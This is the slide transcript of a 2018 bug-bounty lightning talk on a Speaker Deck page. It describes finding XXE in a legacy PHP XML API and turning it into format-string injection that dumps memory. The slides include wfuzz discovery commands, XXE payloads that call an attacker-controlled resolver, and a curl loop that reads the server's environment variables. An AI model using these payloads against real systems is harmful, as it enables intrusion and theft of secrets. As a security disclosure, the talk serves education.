Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web based format injection, dumping memory like...

Frans Rosén
September 19, 2018
Research
0
68

Web based format injection, dumping memory like it's 99 (or "Please help")

My lightning talk from Sec-T Stockholm in September 2018.

Frans Rosén

September 19, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
850
Story of a RCE on Apple through hot jar swapping
fransrosen
0
970
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
A methodology using fuzzing and info disclosure
fransrosen
0
220
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
7.9k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.7k

Other Decks in Research

See All in Research
ニュースメディアにおける事前学習済みモデルの可能性と課題 / IBIS2024
upura
3
510
クラウドソーシングによる学習データ作成と品質管理(セキュリティキャンプ2024全国大会D2講義資料)
takumi1001
0
290
Language is primarily a tool for communication rather than thought
ryou0634
4
740
Global Evidence Summit (GES) 参加報告
daimoriwaki
0
150
工学としてのSRE再訪 / Revisiting SRE as Engineering
yuukit
19
11k
Human-Informed Machine Learning Models and Interactions
hiromu1996
2
480
言語と数理の交差点:テキストの埋め込みと構造のモデル化 (IBIS 2024 チュートリアル)
yukiar
3
740
Leveraging LLMs for Unsupervised Dense Retriever Ranking (SIGIR 2024)
kampersanda
2
200
論文読み会 SNLP2024 Instruction-tuned Language Models are Better Knowledge Learners. In: ACL 2024
s_mizuki_nlp
1
360
MetricSifter:クラウドアプリケーションにおける故障箇所特定の効率化のための多変量時系列データの特徴量削減 / FIT 2024
yuukit
2
120
外積やロドリゲスの回転公式を利用した点群の回転
kentaitakura
1
650
Tietovuoto Social Design Agency (SDA) -trollitehtaasta
hponka
0
2.5k

Featured

See All Featured
Testing 201, or: Great Expectations
jmmastey
38
7.1k
Documentation Writing (for coders)
carmenintech
65
4.4k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
26
2.1k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
10
720
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
16
2.1k
Visualization
eitanlees
145
15k
We Have a Design System, Now What?
morganepeng
50
7.2k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
191
16k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Speed Design
sergeychernyshev
25
620

Transcript

  1. @fransrosen Web based format injection, dumping memory like it's 99

    or "Please help"

  2. @fransrosen Public Bug Bounty

  3. @fransrosen RCE is 30,000 USD

  4. @fransrosen Methodology • Found a domain not like the other

    ones

  5. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization

  6. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

  7. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

  8. @fransrosen Methodology • Google + GitHub etc

  9. @fransrosen Methodology • Google + GitHub etc

  10. @fransrosen Methodology • Google + GitHub etc

  11. @fransrosen Methodology • Google + GitHub etc

  12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

  14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

  15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

  17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

  18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  19. @fransrosen xml_api?

  20. @fransrosen xml_api?

  21. @fransrosen xml_api? YEAH! 👍

  22. @fransrosen wtf!?

  23. @fransrosen XXE!

  24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

  33. @fransrosen

  34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

  39. @fransrosen Format String Injection?

  40. @fransrosen Format String Injection ON ZE WEB?

  41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  44. @fransrosen I can’t handle this shit

  45. @fransrosen Help me, zetatwo

  46. @fransrosen Help me, zetatwo

  47. @fransrosen Help me, zetatwo

  48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  50. @fransrosen Limitations 0x20-0xFF (no 0x22)

  51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  60. @fransrosen Want to collaborate? @fransrosen

  61. @fransrosen Questions? Suggestions?